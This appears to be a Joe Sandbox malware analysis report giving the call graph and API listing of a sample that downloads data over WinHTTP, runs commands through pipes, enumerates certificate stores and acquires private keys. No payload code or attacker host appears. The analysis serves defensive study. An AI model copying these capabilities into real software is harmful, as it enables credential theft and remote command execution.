API calls 5038->5040 5041 7ff6f2d6e298 PathAppendW PathFileExistsW 5039->5041 5042 7ff6f2d6e38b 5040->5042 5041->5038 5045 7ff6f2d6e2bd CreateFileW 5041->5045 5046 7ff6f2d61990 4 API calls 5042->5046 5045->5038 5049 7ff6f2d6e2f2 GetFileSize 5045->5049 5050 7ff6f2d6e39a 5046->5050 5103 7ff6f2d62588 GetProcessHeap HeapAlloc 5049->5103 5088 7ff6f2d6ccd7 5087->5088 5089 7ff6f2d6cc47 RegEnumKeyExW 5087->5089 5088->4966 5090 7ff6f2d6cccc RegCloseKey 5089->5090 5091 7ff6f2d6cc7d RegEnumKeyExW 5089->5091 5090->5088 5091->5090 5094 7ff6f2d6d04b 5093->5094 5094->4980 5096 7ff6f2d6e7cc 2 API calls 5095->5096 5097 7ff6f2d6e8c3 5096->5097 5104 7ff6f2d6e750 5097->5104 5100 7ff6f2d6e6dc 4 API calls 5101 7ff6f2d6ddd9 5100->5101 5101->4986 5105 7ff6f2d6e797 5104->5105 5107 7ff6f2d6e76b 5104->5107 5105->5100 5106 7ff6f2d6e6dc 4 API calls 5106->5107 5107->5105 5107->5106 5108 7ff6f2d6250c 5113 7ff6f2d6213c 5108->5113 5111 7ff6f2d6253b 5156 7ff6f2d61c80 5113->5156 5116 7ff6f2d625b4 2 API calls 5117 7ff6f2d6219e 5116->5117 5118 7ff6f2d624e6 5117->5118 5119 7ff6f2d621ba WinHttpCrackUrl 5117->5119 5118->5111 5145 7ff6f2d61eec 5118->5145 5120 7ff6f2d624dd WinHttpCloseHandle 5119->5120 5121 7ff6f2d621e6 5119->5121 5120->5118 5122 7ff6f2d621f7 WinHttpConnect 5121->5122 5122->5120 5123 7ff6f2d62225 5122->5123 5123->5123 5124 7ff6f2d6228b WinHttpOpenRequest 5123->5124 5125 7ff6f2d622ba 5124->5125 5126 7ff6f2d624cd WinHttpCloseHandle 5124->5126 5127 7ff6f2d62304 WinHttpSendRequest 5125->5127 5128 7ff6f2d622c0 WinHttpQueryOption WinHttpSetOption 5125->5128 5126->5120 5129 7ff6f2d6232b WinHttpReceiveResponse 5127->5129 5130 7ff6f2d624c4 WinHttpCloseHandle 5127->5130 5128->5127 5129->5130 5131 7ff6f2d6233e 5129->5131 5130->5126 5132 7ff6f2d6e7cc 2 API calls 5131->5132 5133 7ff6f2d6234d WinHttpQueryDataAvailable 5132->5133 5134 7ff6f2d6e6dc 4 API calls 5133->5134 5135 7ff6f2d6236d WinHttpReadData 5134->5135 5136 7ff6f2d6238b 5135->5136 5136->5133 5137 7ff6f2d6e72c 4 API calls 5136->5137 5139 
7ff6f2d6239f 5136->5139 5137->5136 5138 7ff6f2d624ba 5138->5130 5139->5138 5160 7ff6f2d67a60 5139->5160 5184 7ff6f2d61de8 5145->5184 5148 7ff6f2d61f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 5150 7ff6f2d6262c 5148->5150 5149 7ff6f2d62121 5149->5111 5151 7ff6f2d61fa8 SafeArrayUnaccessData 5150->5151 5153 7ff6f2d61fd9 5151->5153 5154 7ff6f2d61ffe SysFreeString 5153->5154 5155 7ff6f2d61cbc 11 API calls 5153->5155 5154->5149 5155->5154 5157 7ff6f2d61ca1 5156->5157 5158 7ff6f2d61ca5 WinHttpOpen 5157->5158 5159 7ff6f2d679f0 2 API calls 5157->5159 5158->5116 5159->5158 5161 7ff6f2d67a84 5160->5161 5163 7ff6f2d624a5 5160->5163 5172 7ff6f2d625dc GetProcessHeap HeapAlloc 5161->5172 5164 7ff6f2d61cbc 5163->5164 5173 7ff6f2d6a520 5164->5173 5174 7ff6f2d6a551 5173->5174 5183 7ff6f2d625dc GetProcessHeap HeapAlloc 5174->5183 5190 7ff6f2d61b74 5184->5190 5186 7ff6f2d61e06 RegCreateKeyExA 5187 7ff6f2d61e3f CoInitializeEx VariantInit CoCreateInstance 5186->5187 5188 7ff6f2d61e46 5186->5188 5187->5148 5187->5149 5188->5188 5189 7ff6f2d61ea2 RegSetValueExA RegCloseKey 5188->5189 5189->5187 5191 7ff6f2d61bc3 5190->5191 5191->5186 4195 7ff6f2d69ac8 4196 7ff6f2d69af7 4195->4196 4197 7ff6f2d61990 4 API calls 4196->4197 4198 7ff6f2d69b02 4197->4198 4332 7ff6f2d69644 4198->4332 4200 7ff6f2d69b0b 4200->4200 4337 7ff6f2d6900c 4200->4337 4203 7ff6f2d6a4e7 4205 7ff6f2d61990 4 API calls 4203->4205 4206 7ff6f2d6a4ff 4205->4206 4207 7ff6f2d69b7d 4207->4203 4372 7ff6f2d697dc 4207->4372 4210 7ff6f2d61990 4 API calls 4211 7ff6f2d69bb7 4210->4211 4212 7ff6f2d697dc 16 API calls 4211->4212 4213 7ff6f2d69bcf 4212->4213 4213->4203 4214 7ff6f2d61990 4 API calls 4213->4214 4215 7ff6f2d69be2 4214->4215 4216 7ff6f2d697dc 16 API calls 4215->4216 4217 7ff6f2d69bfa 4216->4217 4217->4203 4218 7ff6f2d61990 4 API calls 4217->4218 4219 7ff6f2d69c0d 4218->4219 4220 7ff6f2d697dc 16 API calls 4219->4220 4221 7ff6f2d69c25 4220->4221 4221->4203 4222 7ff6f2d61990 4 API calls 4221->4222 4223 7ff6f2d69c38 
4222->4223 4224 7ff6f2d697dc 16 API calls 4223->4224 4225 7ff6f2d69c50 4224->4225 4225->4203 4226 7ff6f2d61990 4 API calls 4225->4226 4227 7ff6f2d69c63 4226->4227 4228 7ff6f2d697dc 16 API calls 4227->4228 4229 7ff6f2d69c7b 4228->4229 4229->4203 4230 7ff6f2d61990 4 API calls 4229->4230 4231 7ff6f2d69c8e 4230->4231 4232 7ff6f2d697dc 16 API calls 4231->4232 4233 7ff6f2d69ca6 4232->4233 4233->4203 4234 7ff6f2d61990 4 API calls 4233->4234 4235 7ff6f2d69cb9 4234->4235 4236 7ff6f2d697dc 16 API calls 4235->4236 4237 7ff6f2d69cd1 4236->4237 4237->4203 4238 7ff6f2d61990 4 API calls 4237->4238 4239 7ff6f2d69ce4 4238->4239 4240 7ff6f2d697dc 16 API calls 4239->4240 4241 7ff6f2d69cfc 4240->4241 4241->4203 4242 7ff6f2d61990 4 API calls 4241->4242 4243 7ff6f2d69d0f 4242->4243 4244 7ff6f2d697dc 16 API calls 4243->4244 4245 7ff6f2d69d27 4244->4245 4245->4203 4246 7ff6f2d61990 4 API calls 4245->4246 4247 7ff6f2d69d3a 4246->4247 4248 7ff6f2d697dc 16 API calls 4247->4248 4249 7ff6f2d69d52 4248->4249 4249->4203 4250 7ff6f2d61990 4 API calls 4249->4250 4251 7ff6f2d69d65 4250->4251 4252 7ff6f2d697dc 16 API calls 4251->4252 4253 7ff6f2d69d7d 4252->4253 4253->4203 4254 7ff6f2d61990 4 API calls 4253->4254 4255 7ff6f2d69d90 4254->4255 4256 7ff6f2d697dc 16 API calls 4255->4256 4257 7ff6f2d69da8 4256->4257 4257->4203 4258 7ff6f2d61990 4 API calls 4257->4258 4259 7ff6f2d69dbb 4258->4259 4260 7ff6f2d697dc 16 API calls 4259->4260 4261 7ff6f2d69dd3 4260->4261 4261->4203 4262 7ff6f2d61990 4 API calls 4261->4262 4263 7ff6f2d69de6 4262->4263 4263->4263 4264 7ff6f2d697dc 16 API calls 4263->4264 4265 7ff6f2d69e4c 4264->4265 4265->4203 4266 7ff6f2d61990 4 API calls 4265->4266 4267 7ff6f2d69e5f 4266->4267 4267->4267 4268 7ff6f2d697dc 16 API calls 4267->4268 4269 7ff6f2d69eba 4268->4269 4269->4203 4270 7ff6f2d61990 4 API calls 4269->4270 4271 7ff6f2d69ecd 4270->4271 4271->4271 4272 7ff6f2d697dc 16 API calls 4271->4272 4273 7ff6f2d69f2f 4272->4273 4273->4203 4274 7ff6f2d61990 4 API calls 4273->4274 4275 
7ff6f2d69f42 4274->4275 4275->4275 4276 7ff6f2d697dc 16 API calls 4275->4276 4277 7ff6f2d69f99 4276->4277 4277->4203 4278 7ff6f2d61990 4 API calls 4277->4278 4279 7ff6f2d69fac 4278->4279 4279->4279 4280 7ff6f2d697dc 16 API calls 4279->4280 4281 7ff6f2d6a002 4280->4281 4281->4203 4282 7ff6f2d61990 4 API calls 4281->4282 4283 7ff6f2d6a015 4282->4283 4283->4283 4284 7ff6f2d697dc 16 API calls 4283->4284 4285 7ff6f2d6a072 4284->4285 4285->4203 4286 7ff6f2d61990 4 API calls 4285->4286 4287 7ff6f2d6a085 4286->4287 4287->4287 4288 7ff6f2d697dc 16 API calls 4287->4288 4289 7ff6f2d6a0db 4288->4289 4289->4203 4290 7ff6f2d61990 4 API calls 4289->4290 4291 7ff6f2d6a0ee 4290->4291 4291->4291 4292 7ff6f2d697dc 16 API calls 4291->4292 4293 7ff6f2d6a14b 4292->4293 4293->4203 4294 7ff6f2d61990 4 API calls 4293->4294 4295 7ff6f2d6a162 4294->4295 4295->4295 4296 7ff6f2d697dc 16 API calls 4295->4296 4297 7ff6f2d6a1bb 4296->4297 4297->4203 4298 7ff6f2d61990 4 API calls 4297->4298 4299 7ff6f2d6a1d2 4298->4299 4299->4299 4300 7ff6f2d697dc 16 API calls 4299->4300 4301 7ff6f2d6a221 4300->4301 4301->4203 4302 7ff6f2d61990 4 API calls 4301->4302 4303 7ff6f2d6a238 4302->4303 4303->4303 4304 7ff6f2d697dc 16 API calls 4303->4304 4305 7ff6f2d6a289 4304->4305 4305->4203 4306 7ff6f2d61990 4 API calls 4305->4306 4307 7ff6f2d6a2a0 4306->4307 4307->4307 4308 7ff6f2d697dc 16 API calls 4307->4308 4309 7ff6f2d6a2e6 4308->4309 4309->4203 4310 7ff6f2d61990 4 API calls 4309->4310 4311 7ff6f2d6a2fd 4310->4311 4311->4311 4312 7ff6f2d697dc 16 API calls 4311->4312 4313 7ff6f2d6a34b 4312->4313 4313->4203 4314 7ff6f2d61990 4 API calls 4313->4314 4315 7ff6f2d6a365 4314->4315 4315->4315 4316 7ff6f2d697dc 16 API calls 4315->4316 4317 7ff6f2d6a3af 4316->4317 4317->4203 4318 7ff6f2d61990 4 API calls 4317->4318 4319 7ff6f2d6a3c2 4318->4319 4319->4319 4320 7ff6f2d697dc 16 API calls 4319->4320 4321 7ff6f2d6a423 4320->4321 4321->4203 4322 7ff6f2d61990 4 API calls 4321->4322 4323 7ff6f2d6a436 4322->4323 4323->4323 4324 
7ff6f2d697dc 16 API calls 4323->4324 4325 7ff6f2d6a485 4324->4325 4325->4203 4326 7ff6f2d61990 4 API calls 4325->4326 4327 7ff6f2d6a494 4326->4327 4327->4327 4328 7ff6f2d697dc 16 API calls 4327->4328 4329 7ff6f2d6a4da 4328->4329 4329->4203 4330 7ff6f2d6a4de 4329->4330 4421 7ff6f2d69478 4330->4421 4437 7ff6f2d6e7cc 4332->4437 4335 7ff6f2d6e7cc 2 API calls 4336 7ff6f2d69672 4335->4336 4336->4200 4441 7ff6f2d62554 4337->4441 4340 7ff6f2d69069 4345 7ff6f2d61990 4 API calls 4340->4345 4341 7ff6f2d690a3 CreatePipe 4342 7ff6f2d690e8 CreatePipe 4341->4342 4343 7ff6f2d690c1 4341->4343 4344 7ff6f2d69106 4342->4344 4351 7ff6f2d69130 4342->4351 4346 7ff6f2d61990 4 API calls 4343->4346 4350 7ff6f2d61990 4 API calls 4344->4350 4347 7ff6f2d6907d GetLastError 4345->4347 4348 7ff6f2d690d5 GetLastError 4346->4348 4349 7ff6f2d6908e 4347->4349 4348->4349 4354 7ff6f2d61a70 5 API calls 4349->4354 4352 7ff6f2d6911a GetLastError 4350->4352 4443 7ff6f2d67cfc 4351->4443 4352->4349 4356 7ff6f2d6909c 4354->4356 4355 7ff6f2d6917b CreateProcessW 4357 7ff6f2d625b4 2 API calls 4355->4357 4356->4203 4364 7ff6f2d695a0 WaitForSingleObject 4356->4364 4358 7ff6f2d691c7 4357->4358 4359 7ff6f2d691cb 4358->4359 4360 7ff6f2d691f5 CloseHandle 4358->4360 4361 7ff6f2d61990 4 API calls 4359->4361 4360->4356 4362 7ff6f2d691df GetLastError 4361->4362 4363 7ff6f2d691f0 4362->4363 4363->4360 4365 7ff6f2d695c3 4364->4365 4370 7ff6f2d69600 4364->4370 4366 7ff6f2d695d4 4365->4366 4448 7ff6f2d6968c PeekNamedPipe 4365->4448 4367 7ff6f2d695ee GetExitCodeProcess 4366->4367 4369 7ff6f2d6968c 6 API calls 4366->4369 4366->4370 4367->4370 4371 7ff6f2d695ea 4369->4371 4370->4207 4371->4367 4371->4370 4373 7ff6f2d61990 4 API calls 4372->4373 4374 7ff6f2d69813 4373->4374 4374->4374 4375 7ff6f2d61990 4 API calls 4374->4375 4376 7ff6f2d69877 4375->4376 4377 7ff6f2d679f0 2 API calls 4376->4377 4378 7ff6f2d6987f 4377->4378 4379 7ff6f2d619e4 4 API calls 4378->4379 4380 7ff6f2d6988d 4379->4380 4381 7ff6f2d625b4 2 API calls 
4380->4381 4382 7ff6f2d69895 4381->4382 4383 7ff6f2d61990 4 API calls 4382->4383 4384 7ff6f2d698a4 4383->4384 4462 7ff6f2d69224 GetSystemTimeAsFileTime 4384->4462 4387 7ff6f2d6e6dc 4 API calls 4388 7ff6f2d698cd 4387->4388 4389 7ff6f2d6e6dc 4 API calls 4388->4389 4390 7ff6f2d698ed 4389->4390 4391 7ff6f2d699cf 4390->4391 4392 7ff6f2d61990 4 API calls 4390->4392 4393 7ff6f2d61a70 5 API calls 4391->4393 4394 7ff6f2d6993f 4392->4394 4395 7ff6f2d699ef 4393->4395 4397 7ff6f2d69943 4394->4397 4398 7ff6f2d69950 4394->4398 4396 7ff6f2d61990 4 API calls 4395->4396 4400 7ff6f2d699fe 4396->4400 4399 7ff6f2d619e4 4 API calls 4397->4399 4401 7ff6f2d679f0 2 API calls 4398->4401 4402 7ff6f2d6994e 4399->4402 4400->4203 4400->4210 4403 7ff6f2d69958 4401->4403 4406 7ff6f2d61990 4 API calls 4402->4406 4404 7ff6f2d619e4 4 API calls 4403->4404 4405 7ff6f2d69966 4404->4405 4407 7ff6f2d625b4 2 API calls 4405->4407 4408 7ff6f2d6997d 4406->4408 4407->4402 4409 7ff6f2d61990 4 API calls 4408->4409 4410 7ff6f2d69991 4409->4410 4411 7ff6f2d69995 4410->4411 4412 7ff6f2d699a2 4410->4412 4413 7ff6f2d619e4 4 API calls 4411->4413 4414 7ff6f2d679f0 2 API calls 4412->4414 4415 7ff6f2d699a0 4413->4415 4416 7ff6f2d699aa 4414->4416 4419 7ff6f2d61990 4 API calls 4415->4419 4417 7ff6f2d619e4 4 API calls 4416->4417 4418 7ff6f2d699b8 4417->4418 4420 7ff6f2d625b4 2 API calls 4418->4420 4419->4391 4420->4415 4483 7ff6f2d6971c 4421->4483 4424 7ff6f2d6968c 6 API calls 4429 7ff6f2d694cf 4424->4429 4425 7ff6f2d694fc WaitForSingleObject 4426 7ff6f2d6954d 4425->4426 4427 7ff6f2d69512 GetSystemTimeAsFileTime 4425->4427 4428 7ff6f2d69540 4426->4428 4430 7ff6f2d69563 4426->4430 4431 7ff6f2d6968c 6 API calls 4426->4431 4427->4429 4428->4203 4429->4424 4429->4425 4429->4428 4435 7ff6f2d69534 TerminateProcess 4429->4435 4430->4428 4432 7ff6f2d6957d GetExitCodeProcess 4430->4432 4433 7ff6f2d6968c 6 API calls 4430->4433 4431->4430 4432->4428 4434 7ff6f2d6958f CloseHandle 4432->4434 4436 7ff6f2d69579 4433->4436 4434->4428 
4435->4428 4436->4428 4436->4432 4440 7ff6f2d625dc GetProcessHeap HeapAlloc 4437->4440 4439 7ff6f2d6965f 4439->4335 4442 7ff6f2d62561 CreatePipe 4441->4442 4442->4340 4442->4341 4444 7ff6f2d67d0e 4443->4444 4447 7ff6f2d625dc GetProcessHeap HeapAlloc 4444->4447 4446 7ff6f2d67d1d 4446->4355 4449 7ff6f2d696c2 4448->4449 4454 7ff6f2d696ca 4448->4454 4449->4454 4455 7ff6f2d6e6dc 4449->4455 4452 7ff6f2d69701 4459 7ff6f2d6e72c 4452->4459 4454->4366 4456 7ff6f2d696dc ReadFile 4455->4456 4457 7ff6f2d6e6f9 4455->4457 4456->4452 4456->4454 4457->4457 4458 7ff6f2d62654 4 API calls 4457->4458 4458->4456 4460 7ff6f2d6e6dc 4 API calls 4459->4460 4461 7ff6f2d6e741 4460->4461 4461->4454 4463 7ff6f2d69264 4462->4463 4482 7ff6f2d625dc GetProcessHeap HeapAlloc 4463->4482 4465 7ff6f2d692b1 4466 7ff6f2d6971c WriteFile 4465->4466 4467 7ff6f2d692fe 4466->4467 4468 7ff6f2d625b4 GetProcessHeap RtlFreeHeap 4467->4468 4472 7ff6f2d69306 4468->4472 4469 7ff6f2d6968c 6 API calls 4469->4472 4470 7ff6f2d693a2 WaitForSingleObject 4471 7ff6f2d693f5 4470->4471 4473 7ff6f2d693b8 GetSystemTimeAsFileTime 4470->4473 4471->4387 4472->4469 4472->4470 4472->4471 4474 7ff6f2d69418 WaitForSingleObject 4472->4474 4477 7ff6f2d693e9 TerminateProcess 4472->4477 4473->4472 4474->4471 4475 7ff6f2d6942e 4474->4475 4476 7ff6f2d6943e 4475->4476 4478 7ff6f2d6968c 6 API calls 4475->4478 4476->4471 4479 7ff6f2d69458 GetExitCodeProcess 4476->4479 4480 7ff6f2d6968c 6 API calls 4476->4480 4477->4471 4478->4476 4479->4471 4481 7ff6f2d69454 4480->4481 4481->4471 4481->4479 4485 7ff6f2d6974b 4483->4485 4486 7ff6f2d694ba GetSystemTimeAsFileTime 4485->4486 4487 7ff6f2d697a4 WriteFile 4485->4487 4486->4429 4488 7ff6f2d697c7 4487->4488 4488->4485 5192 7ff6f2d6ec08 5193 7ff6f2d6ec33 5192->5193 5194 7ff6f2d6ec1f 5192->5194 5198 7ff6f2d625dc GetProcessHeap HeapAlloc 5194->5198 5214 7ff6f2d6e4d4 lstrcpyW PathAppendW 5215 7ff6f2d6e520 5214->5215 5216 7ff6f2d6ccf8 6 API calls 5215->5216 5218 7ff6f2d6e53b 5216->5218 5217 7ff6f2d6e5ee 
5218->5217 5219 7ff6f2d61990 4 API calls 5218->5219 5220 7ff6f2d6e55a 5219->5220 5221 7ff6f2d619e4 4 API calls 5220->5221 5222 7ff6f2d6e565 5221->5222 5223 7ff6f2d61990 4 API calls 5222->5223 5224 7ff6f2d6e57c 5223->5224 5225 7ff6f2d619e4 4 API calls 5224->5225 5226 7ff6f2d6e58b 5225->5226 5227 7ff6f2d61990 4 API calls 5226->5227 5228 7ff6f2d6e5e2 5227->5228 5229 7ff6f2d625b4 2 API calls 5228->5229 5229->5217 5237 7ff6f2d66b94 5238 7ff6f2d66bbf 5237->5238 5239 7ff6f2d67234 5 API calls 5238->5239 5240 7ff6f2d66c2e 5239->5240 5241 7ff6f2d67234 5 API calls 5240->5241 5242 7ff6f2d66c9d 5241->5242 5243 7ff6f2d67234 5 API calls 5242->5243 5244 7ff6f2d66d09 5243->5244 5245 7ff6f2d614d4 5246 7ff6f2d614ea 5245->5246 5247 7ff6f2d61507 5245->5247 5246->5247 5248 7ff6f2d61501 RemoveVectoredExceptionHandler 5246->5248 5248->5247 5249 7ff6f2d668d4 5250 7ff6f2d668f7 5249->5250 5251 7ff6f2d67234 5 API calls 5250->5251 5252 7ff6f2d66971 5251->5252 5253 7ff6f2d67234 5 API calls 5252->5253 5254 7ff6f2d66990 5253->5254 5255 7ff6f2d67234 5 API calls 5254->5255 5256 7ff6f2d669af 5255->5256 5257 7ff6f2d672d4 5 API calls 5256->5257 5258 7ff6f2d669ce 5257->5258 5259 7ff6f2d66054 5260 7ff6f2d66077 5259->5260 5261 7ff6f2d67234 5 API calls 5260->5261 5262 7ff6f2d660f1 5261->5262 5263 7ff6f2d67234 5 API calls 5262->5263 5264 7ff6f2d66110 5263->5264 5265 7ff6f2d67234 5 API calls 5264->5265 5266 7ff6f2d6612f 5265->5266 5267 7ff6f2d67234 5 API calls 5266->5267 5268 7ff6f2d6619e 5267->5268 5269 7ff6f2d67234 5 API calls 5268->5269 5270 7ff6f2d661bd 5269->5270 5271 7ff6f2d672d4 5 API calls 5270->5271 5272 7ff6f2d661dc 5271->5272

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 129 7ff6f2d69224-7ff6f2d69306 GetSystemTimeAsFileTime call 7ff6f2d69a20 * 3 call 7ff6f2d69a98 call 7ff6f2d62698 call 7ff6f2d625dc call 7ff6f2d67b34 * 4 call 7ff6f2d6971c call 7ff6f2d625b4 154 7ff6f2d69309-7ff6f2d69317 129->154 155 7ff6f2d69329-7ff6f2d69330 154->155 156 7ff6f2d69319-7ff6f2d6931c call 7ff6f2d6968c 154->156 157 7ff6f2d6938c-7ff6f2d69393 155->157 158 7ff6f2d69332-7ff6f2d69335 155->158 163 7ff6f2d69321-7ff6f2d69323 156->163 161 7ff6f2d69395-7ff6f2d69399 call 7ff6f2d6968c 157->161 162 7ff6f2d693a2-7ff6f2d693b6 WaitForSingleObject 157->162 158->157 160 7ff6f2d69337-7ff6f2d69351 158->160 165 7ff6f2d69382-7ff6f2d69386 160->165 166 7ff6f2d69353-7ff6f2d69365 call 7ff6f2d67b50 160->166 172 7ff6f2d6939e-7ff6f2d693a0 161->172 164 7ff6f2d693f5 162->164 168 7ff6f2d693b8-7ff6f2d693ca GetSystemTimeAsFileTime 162->168 163->155 163->164 169 7ff6f2d693f7-7ff6f2d69417 164->169 165->157 171 7ff6f2d69418-7ff6f2d6942c WaitForSingleObject 165->171 178 7ff6f2d69367-7ff6f2d6936e 166->178 179 7ff6f2d69374-7ff6f2d69380 166->179 168->154 173 7ff6f2d693d0-7ff6f2d693e3 call 7ff6f2d69a98 168->173 171->164 176 7ff6f2d6942e-7ff6f2d69434 171->176 172->162 172->164 173->154 182 7ff6f2d693e9-7ff6f2d693ef TerminateProcess 173->182 180 7ff6f2d69436-7ff6f2d69439 call 7ff6f2d6968c 176->180 181 7ff6f2d69442-7ff6f2d69449 176->181 178->171 178->179 179->165 179->166 186 7ff6f2d6943e-7ff6f2d69440 180->186 184 7ff6f2d6944b-7ff6f2d6944f call 7ff6f2d6968c 181->184 185 7ff6f2d69458-7ff6f2d69468 GetExitCodeProcess 181->185 182->164 190 7ff6f2d69454-7ff6f2d69456 184->190 188 7ff6f2d6946a-7ff6f2d69471 185->188 189 7ff6f2d69473-7ff6f2d69475 185->189 186->164 186->181 188->164 188->189 189->169 190->164 190->185
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D6924D
                                                                                                                                          • Part of subcall function 00007FF6F2D625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61985,?,?,?,00007FF6F2D6155F), ref: 00007FF6F2D625E5
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D693AB
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D693C0
                                                                                                                                        • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D693EF
                                                                                                                                          • Part of subcall function 00007FF6F2D6968C: PeekNamedPipe.KERNELBASE ref: 00007FF6F2D696B8
• WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF6F2D69421
• GetExitCodeProcess.KERNELBASE ref: 00007FF6F2D69460
Strings
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
• String ID: & echo
• API String ID: 2711250446-3491486023

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: Initialize$CreateInstanceSecurity
• String ID:
• API String ID: 89549506-0

Control-flow Graph

• Executed
• Not Executed
Control-flow graph nodes: 682 (7ff6f2d625b4-7ff6f2d625b7), 683 (7ff6f2d625da), 684 (7ff6f2d625b9-7ff6f2d625d9: GetProcessHeap, RtlFreeHeap); edges: 682->683, 682->684, 684->683
APIs
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0

Control-flow Graph

APIs
• CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6F2D62D90
• CertGetNameStringW.CRYPT32 ref: 00007FF6F2D62DD3
• CertNameToStrW.CRYPT32 ref: 00007FF6F2D62EB8
• CertNameToStrW.CRYPT32 ref: 00007FF6F2D62F0A
• FileTimeToSystemTime.KERNEL32 ref: 00007FF6F2D62F4B
• FileTimeToSystemTime.KERNEL32 ref: 00007FF6F2D62FC1
  • Part of subcall function 00007FF6F2D61A70: wvsprintfW.USER32 ref: 00007FF6F2D61AA9
  • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
  • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
• CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6F2D63178
  • Part of subcall function 00007FF6F2D63220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D6325E
  • Part of subcall function 00007FF6F2D63220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6F2D6328D
  • Part of subcall function 00007FF6F2D63220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D632BB
  • Part of subcall function 00007FF6F2D63220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63336
  • Part of subcall function 00007FF6F2D63220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63380
  • Part of subcall function 00007FF6F2D63220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D633AC
Strings
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
• String ID: 1.2.840.113549
• API String ID: 2787208766-3888290641

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
